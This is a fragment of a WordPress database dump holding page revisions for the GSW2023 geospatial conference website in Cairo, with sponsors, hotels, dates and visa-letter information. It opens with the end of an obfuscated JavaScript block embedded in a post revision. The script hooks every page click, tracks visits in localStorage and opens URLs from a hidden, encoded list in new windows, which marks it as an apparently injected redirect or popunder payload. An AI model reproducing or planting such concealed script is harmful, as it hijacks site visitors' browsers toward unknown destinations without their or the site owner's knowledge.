_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-09 22:16:19','2023-06-09 22:16:19','',3066,'https://gsw2023.com/?p=4674',0,'revision','',0),
(4675,1,'2023-06-09 22:34:05','2023-06-09 22:34:05','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686349986030{margin-top: 180px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1685735404108{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317472179{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686320769324{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>Invitation letter</strong></span></h2>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>You will receive an invitation letter automatically once you provide your Name (as it appears in your passport), PassportNumber ,Nationality and Your Organization .</strong></span></p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>If you require specific format for the Visa Letter, please Send email to </strong></span></p>\n<p style=\"text-align: center;\"><strong style=\"color: #ffffff;\"><span style=\"color: #ffff00;\"> <a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\">GSW-visa@gsw2023.com</a></span> to edit/add the text of the letter.</strong></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fvisa.gsw2023.com%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686318545126{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Get Your Invitation letter[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps 